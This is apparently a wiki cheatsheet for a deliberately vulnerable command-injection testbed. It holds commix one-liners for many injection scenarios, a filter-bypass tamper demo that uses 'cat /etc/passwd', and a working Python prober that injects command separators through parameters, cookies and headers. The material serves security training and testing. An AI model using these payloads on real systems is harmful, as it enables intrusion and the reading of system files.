
Commix Testbed Cheatsheet

Anastasios Stasinopoulos edited this page Mar 5, 2023 · 5 revisions

Note: The following examples are based on the dockerized version of Commix-testbed, assumed to be reachable at http://lab:9090 (adjust the host and port to your own deployment).

1. Regular (GET / POST)

Classic regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic.php" --data="addr=127.0.0.1"

Classic (Base64) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_b64.php?addr=MTI3LjAuMC4x"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_b64.php" --data="addr=MTI3LjAuMC4x"

Classic (Hex) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_hex.php?addr=3132372E302E302E31"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_hex.php" --data="addr=3132372E302E302E31"

Classic single-quote example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_quote.php?addr=127.0.0.1" --level=3

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_quote.php" --data="addr=127.0.0.1" --level=3

Classic double-quote example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_double_quote.php?addr=127.0.0.1" --level=3

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_double_quote.php" --data="addr=127.0.0.1" --level=3

Classic non-space example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_non_space.php?addr=127.0.0.1" --tamper="space2ifs"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_non_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Classic blacklisting example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_blacklisting.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_blacklisting.php" --data="addr=127.0.0.1"

Classic hashing example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_hash.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_hash.php" --data="addr=127.0.0.1"

Classic example & Basic HTTP authentication exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_basic_auth.php?addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="basic"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_basic_auth.php" --data="addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="basic"

Classic example & Digest HTTP authentication exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/classic_digest_auth.php?addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="digest"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_digest_auth.php" --data="addr=127.0.0.1" --auth-cred="admin:admin" --auth-type="digest"

Blind regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/blind.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind.php" --data="addr=127.0.0.1"

Double Blind regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/double_blind.php?addr=127.0.0.1"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/double_blind.php" --data="addr=127.0.0.1"

Eval regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/eval.php?user=test"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval.php" --data="user=test"

Eval (Base64) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/eval_b64.php?user=MTI3LjAuMC4x"

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval_b64.php" --data="user=MTI3LjAuMC4x"

Classic (SOAP/XML) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>localhost</addr><count>1</count></ping>'

Blind (SOAP/XML) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind_xml.php" --data='<?xml version="1.0" encoding="UTF-8"?><ping><addr>localhost</addr><count>1</count></ping>'

Classic (JSON) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/classic_json.php" --data='{"addr":"test","test":"ancst"}'

Blind (JSON) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/blind_json.php" --data='{"addr":"test","test":"ancst"}'

Eval (JSON) regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/eval_json.php" --data='{"name":"ancst"}'

Preg_match() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_match.php?addr=127.0.0.1"
  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/preg_match.php" --data="addr=127.0.0.1"

Preg_match() blind example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_match.php?addr=127.0.0.1"
  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/preg_match.php" --data="addr=127.0.0.1"

Preg_Replace() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/preg_replace.php?replace=/Hello/&with=Bye" -p with

Assert() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/assert.php?user=ancst"

Str_Replace() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/str_replace.php?user=ancst"
  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/str_replace.php" --data="user=ancst"

Create_Function() regular example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/regular/GET/create_function.php?user=ancst"
  • python3 commix.py -u "http://lab:9090/scenarios/regular/POST/create_function.php" --data="user=ancst"

2. Regex Filters

Regex for domain name validation example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/lax_domain_name.php" --data="addr=127.0.0.1" --suffix="d.e.f"

Nested quotes example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/nested_quotes.php" --data="addr=127.0.0.1" --level=3

Regex filter for colon/pipe/ampersand/dollar example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_colon_no_pipe_no_ampersand_no_dollar.php"

Regex filter for spaces example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_space.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Regex filter for space/colon/pipe/ampersand example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"

Regex filter for space/colon/pipe/ampersand/dollar example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_space_no_colon_no_pipe_no_ampersand_no_dollar.php" --data="addr=127.0.0.1" --technique=f --web-root="/var/www/commix-testbed.com/public_html/" --tamper="space2htab"

Regex filter for white chars example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Alphanum for input end example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/simple_stop_alphanum.php" --data="addr=127.0.0.1"

Alphanum for input end (filter for white chars) example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars_stop_alnum.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Alphanum for input start example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/simple_start_alphanum.php" --data="addr=127.0.0.1"

Alphanum for input start (filter for white chars) example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/no_white_chars_start_alphanum.php" --data="addr=127.0.0.1" --tamper="space2ifs"

Regex filter for OS commands (Windows / *nix) example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/filters/multiple_os_commands_blacklisting.php" --data="addr=127.0.0.1" --tamper="uninitializedvariable"
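The choice of --tamper in the filter scenarios above is not arbitrary: each scenario rejects one character class, and a tamper script rewrites the injected command so that it no longer contains that class while still meaning the same thing to /bin/sh. The script below is an added example (not part of this page, the testbed or commix) that makes the mapping visible. The regular expressions are my assumptions about what each scenario rejects, inferred only from the file names ("colon" read as the semicolon), not the testbed's code, and the three tamper functions imitate the idea behind commix's space2ifs, space2htab and uninitializedvariable scripts rather than reproducing them. It also runs each rewritten command through sh to show the rewrite is behaviour-preserving, which is why a scenario that also blocks `$` forces the switch from `${IFS}` to a tab.

```python
"""
Which tamper gets a command past which (assumed) filter, and why.
Added example; filters are guesses from the scenario file names on the
Commix-testbed cheatsheet, not the testbed's own checks.
"""
import re
import subprocess

# Assumed filters, keyed by scenario file name ("colon" read as ';').
FILTERS = {
    "no_space.php": re.compile(r" "),
    "no_white_chars.php": re.compile(r"\s"),
    "no_colon_no_pipe_no_ampersand_no_dollar.php": re.compile(r"[;|&$]"),
    "no_space_no_colon_no_pipe_no_ampersand.php": re.compile(r"[ ;|&]"),
    "no_space_no_colon_no_pipe_no_ampersand_no_dollar.php": re.compile(r"[ ;|&$]"),
    # assumed blacklist of command names, matched as whole words
    "multiple_os_commands_blacklisting.php": re.compile(
        r"\b(cat|ls|id|whoami|uname|echo|type|dir)\b", re.I),
}


def passes(scenario, payload):
    """True if the (assumed) filter for `scenario` lets `payload` through."""
    return FILTERS[scenario].search(payload) is None


def space2ifs(cmd):
    # 'cat /etc/passwd' -> 'cat${IFS}/etc/passwd': the shell field-splits the
    # expansion of $IFS (space, tab, newline), so the words are separated again.
    return cmd.replace(" ", "${IFS}")


def space2htab(cmd):
    # A tab is ordinary whitespace to the shell but is not a literal space.
    return cmd.replace(" ", "\t")


def uninitializedvariable(cmd, var="qz9"):
    # 'whoami' -> 'w${qz9}hoami': the unset variable expands to nothing, so the
    # word is reassembled at run time but never appears whole in the request.
    # Relies on the variable being unset and the shell not running with set -u.
    return " ".join(w[0] + "${" + var + "}" + w[1:] if len(w) > 1 else w
                    for w in cmd.split(" "))


def run_in_sh(cmd):
    """Execute the (tampered) command with sh and return its stdout."""
    return subprocess.run(["sh", "-c", cmd], capture_output=True,
                          text=True, check=True).stdout


def bypass_table(cmd="echo hello world"):
    """For every scenario, list the tampers (if any) that get `cmd` past the filter."""
    tampers = {
        "none": lambda c: c,
        "space2ifs": space2ifs,
        "space2htab": space2htab,
        "uninitializedvariable": uninitializedvariable,
    }
    return {scenario: [name for name, fn in tampers.items()
                       if passes(scenario, fn(cmd))]
            for scenario in FILTERS}


if __name__ == "__main__":
    for scenario, ok in bypass_table("cat /etc/passwd").items():
        print(f"{scenario:58} {', '.join(ok) or 'no tamper here works'}")
```

Read the table against the one-liners above: no_white_chars rejects the tab as well as the space, leaving `${IFS}`; the scenario that additionally rejects `$` removes `${IFS}` and `$qz9` in one go, leaving the tab; and the command blacklist is untouched by whitespace tricks, so only splitting the command name with an unset variable gets through.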

3. User-Agent HTTP Header

Classic user-agent-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(classic).php" -p user-agent

Blind user-agent-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(blind).php" -p user-agent

Eval user-agent-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/user-agent/ua(eval).php" -p user-agent

4. Cookie HTTP Header

Classic cookie-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(classic).php" -p addr

Classic cookie-based (Base64) example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(b64).php" -p addr

Blind cookie-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(blind).php" -p addr

Eval cookie-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/cookie/cookie(eval).php" -p user

5. Referer HTTP Header

Classic referer-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/referer/referer(classic).php" -p referer

Blind referer-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/referer/referer(blind).php" -p referer

Eval referer-based example exploitation:

  • python3 commix.py -u "http://lab:9090/scenarios/referer/referer(eval).php" -p referer
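What the one-liners in sections 1, 3, 4 and 5 do for you can be reproduced by hand, which is useful when you need to understand a hit or confirm one without the tool. The script below is an added example written for this page (it is not commix code and not part of the testbed): it builds a results-based injection payload, encodes it the way the parameter is decoded (plain, Base64 or hex, matching the `MTI3LjAuMC4x` and `3132372E302E302E31` values above), places it where the scenario reads it (query string, POST body, Cookie, User-Agent or Referer) and confirms execution by looking for a random marker that the injected `echo` prints into the response. The lab:9090 URLs and parameter names are taken from this page; that the `*_b64` / `*_hex` scripts Base64- or hex-decode the value before using it, and that the cookie value is URL-decoded server-side (PHP does this), are assumptions.

```python
"""
Manual results-based command-injection check for the testbed scenarios.
Added example, not commix code; target URLs are the ones on this page.
"""
import base64
import secrets
import urllib.parse
import urllib.request

# Command separators to try; which one works depends on the sink and on any
# quoting around the injected value.  Newlines cannot travel in HTTP headers.
SEPARATORS = [";", "&&", "|", "\n"]
HEADER_PLACES = ("cookie", "user-agent", "referer")


def make_marker():
    # Random token so a hit cannot be a coincidence from normal page content.
    return secrets.token_hex(6)


def build_payload(base_value, marker, separator=";", quote=""):
    """
    Raw injected value.  `quote` closes a surrounding ' or " when the sink wraps
    the parameter in quotes (classic_quote / classic_double_quote); the trailing
    quote re-opens it so the command line stays syntactically valid.
    """
    return f"{base_value}{quote}{separator}echo {marker}{separator}{quote}"


def encode_value(value, encoding):
    """Encode the injected value the way the vulnerable script decodes it."""
    if encoding == "plain":
        return value
    if encoding == "b64":   # assumed: classic_b64.php base64-decodes the value
        return base64.b64encode(value.encode()).decode()
    if encoding == "hex":   # assumed: classic_hex.php hex-decodes the value
        return value.encode().hex().upper()
    raise ValueError(f"unknown encoding {encoding!r}")


def confirm_injection(body, marker):
    """
    True only if the marker appears more often than the literal 'echo <marker>'
    text, i.e. the command ran rather than the input merely being reflected.
    """
    return body.count(marker) > body.count(f"echo {marker}")


def send(url, value, where="query", param="addr", timeout=10.0):
    """One request with the injected value placed where the scenario reads it."""
    headers, data = {}, None
    if where == "query":
        url = f"{url}?{urllib.parse.urlencode({param: value})}"
    elif where == "body":
        data = urllib.parse.urlencode({param: value}).encode()
    elif where == "cookie":
        # ';' would end the cookie, so percent-encode and let the server decode.
        headers["Cookie"] = f"{param}={urllib.parse.quote(value, safe='')}"
    elif where in ("user-agent", "referer"):
        headers[where.title()] = value
    else:
        raise ValueError(f"unknown placement {where!r}")
    req = urllib.request.Request(url, data=data, headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def probe(url, where="query", param="addr", encoding="plain", quote="",
          base_value="127.0.0.1"):
    """Try each separator; return the first raw payload that executed, else None."""
    seps = [s for s in SEPARATORS if s != "\n"] if where in HEADER_PLACES else SEPARATORS
    for sep in seps:
        marker = make_marker()
        raw = build_payload(base_value, marker, sep, quote)
        body = send(url, encode_value(raw, encoding), where, param)
        if confirm_injection(body, marker):
            return raw
    return None


if __name__ == "__main__":
    # Same targets and parameters as the commix one-liners on this page.
    targets = [
        ("http://lab:9090/scenarios/regular/GET/classic.php", {}),
        ("http://lab:9090/scenarios/regular/POST/classic_b64.php", {"where": "body", "encoding": "b64"}),
        ("http://lab:9090/scenarios/regular/GET/classic_hex.php", {"encoding": "hex"}),
        ("http://lab:9090/scenarios/regular/GET/classic_quote.php", {"quote": "'"}),
        ("http://lab:9090/scenarios/cookie/cookie(classic).php", {"where": "cookie"}),
        ("http://lab:9090/scenarios/user-agent/ua(classic).php", {"where": "user-agent", "base_value": "Mozilla/5.0"}),
        ("http://lab:9090/scenarios/referer/referer(classic).php", {"where": "referer", "base_value": "http://lab:9090/"}),
    ]
    for url, opts in targets:
        hit = probe(url, **opts)
        print(f"{url}: {'injectable via ' + repr(hit) if hit else 'no hit'}")
```

The marker comparison in confirm_injection is the part worth keeping even if you never use the rest: a page that simply reflects the submitted parameter contains the string `echo <marker>` once, so counting bare occurrences of the marker above that number separates "the command ran" from "the input was printed back", which is the false positive a naive substring check produces on the classic scenarios.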